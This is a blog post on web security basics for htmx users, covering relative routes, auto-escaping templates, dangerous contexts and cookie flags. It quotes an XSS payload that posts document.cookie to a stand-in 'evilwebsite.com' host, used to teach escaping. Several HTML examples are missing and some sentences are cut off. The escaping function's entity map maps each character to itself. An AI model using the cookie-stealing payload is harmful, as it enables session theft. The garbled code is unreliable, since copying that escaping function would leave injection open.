+++ title = "Web Security Basics (with htmx)" date = 2024-02-06 [taxonomies] author = ["Alexander Petros"] tag = ["posts"] +++ As htmx has gotten more popular, it's reached communities who have never written server-generated HTML before. Dynamic HTML templating was, and still is, the standard way to use many popular web frameworks—like Rails, Django, and Spring—but it is a novel concept for those coming from Single-Page Application (SPA) frameworks—like React and Svelte—where the prevalence of JSX means you never write HTML directly. But have no fear! Writing web applications with HTML templates is a slightly different security model, but it's no harder than securing a JSX-based application, and in some ways it's a lot easier. ## Who is guide this for? These are web security basics with htmx, but they're (mostly) not htmx-specific—these concepts are important to know if you're putting *any* dynamic, user-generated content on the web. For this guide, you should already have a basic grasp of the semantics of the web, and be familiar with how to write a backend server (in any language). For instance, you should know not to create `GET` routes that can alter the backend state. We also assume that you're not doing anything super fancy, like making a website that hosts other people's websites. If you're doing anything like that, the security concepts you need to be aware of far exceed the scope of this guide. We make these simplifying assumptions in order to target the widest possible audience, without including distracting information—obviously this can't catch everyone. No security guide is perfectly comprehensive. If you feel there's a mistake, or an obvious gotcha that we should have mentioned, please reach out and we'll update it. ## The Golden Rules Follow these four simple rules, and you'll be following the client security best practices: 1. Only call routes you control 2. Always use an auto-escaping template engine 3. Only serve user-generated content inside HTML tags 4. If you have authentication cookies, set them with `Secure`, `HttpOnly`, and `SameSite=Lax` In the following section, I'll discuss what each of these rules does, and what kinds of attack they protect against. The vast majority of htmx users—those using htmx to build a website that allows users to login, view some data, and update that data—should never have any reason to break them. Later on I will discuss how to break some of these rules. Many useful applications can be built under these constraints, but if you do need more advanced behavior, you'll be doing so with the full knowledge that you're increasing the conceptual burden of securing your application. And you'll have learned a lot about web security in the process. ## Understanding the Rules ### Only call routes you control This is the most basic one, and the most important: **do not call untrusted routes with htmx.** In practice, this means you should only use relative URLs. This is fine: ```html ``` But this is not: ```html ``` The reason for this is simple: htmx inserts the response from that route directly into the user's page. If the response has a malicious `
``` Fortunately this one is so easy to fix that you can write the code yourself. Whenever you insert untrusted (i.e. user-provided) data, you just have to replace eight characters with their non-code equivalents. This is an example using JavaScript: ```js /** * Replace any characters that could be used to inject a malicious script in an HTML context. */ export function escapeHtmlText (value) { const stringValue = value.toString() const entityMap = { '&': '&', '<': '<', '>': '>', '"': '"', "'": ''', '/': '/', '`': '`', '=': '=' } // Match any of the characters inside /[ ... ]/ const regex = /[&<>"'`=/]/g return stringValue.replace(regex, match => entityMap[match]) } ``` This tiny JS function replaces `<` with `<`, `"` with `"`, and so on. These characters will still render properly as `<` and `"` when they're used in the text, but can't be interpreted as code constructs. The previous malicious bio will now be converted into the following HTML: ```html<script> fetch('evilwebsite.com', { method: 'POST', data: document.cookie }) </script>
``` which displays harmlessly as text. Fortunately, as established above, you don't have to do your escaping manually—I just wanted to demonstrate how simple these concepts are. Every template engine has an auto-escaping feature, and you're going to want to use a template engine anyway. Just make sure that escaping is enabled, and send all your HTML through it. ### Only serve user-generated content inside HTML tags This is an addendum to the template engine rule, but it's important enough to call out on its own. Do not allow your users to define arbitrary CSS or JS content, even with your auto-escaping template engine. ```html ``` And, don't use user-defined attributes or tag names either: ```html <{{ user.tag }}>{{ user.tag }}> {{ user.name }} ``` CSS, JavaScript, and HTML attributes are ["dangerous contexts,"](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#dangerous-contexts) places where it's not safe to allow arbitrary user input, even if it's escaped. Escaping will protect you from some vulnerabilities here, but not all of them; the vulnerabilities are varied enough that it's safest to default to not doing *any* of these. Inserting user-generated text directly into a script tag should never be necessary, but there *are* some situations where you might let users customize their CSS or customize HTML attributes. Handling those properly will be discussed down below. ## Secure your cookies The best way to do authentication with htmx is using cookies. And because htmx encourages interactivity primarily through first-party HTML APIs, it is usually trivial to enable the browser's best cookie security features. These three in particular: * `Secure` - only send the cookie via HTTPS, never HTTP * `HttpOnly` - don't make the cookie available to JavaScript via `document.cookie` * `SameSite=Lax` - don't allow other sites to use your cookie to make requests, unless it's just a plain link To understand what these protect you against, let's go over the basics. If you come from JavaScript SPAs, where it's common to authenticate using the `Authorization` header, you might not be familiar with how cookies work. Fortunately they're very simple. (Please note: this is not an "authentication with htmx" tutorial, just an overview of cookie tokens generally) If your users log in with a `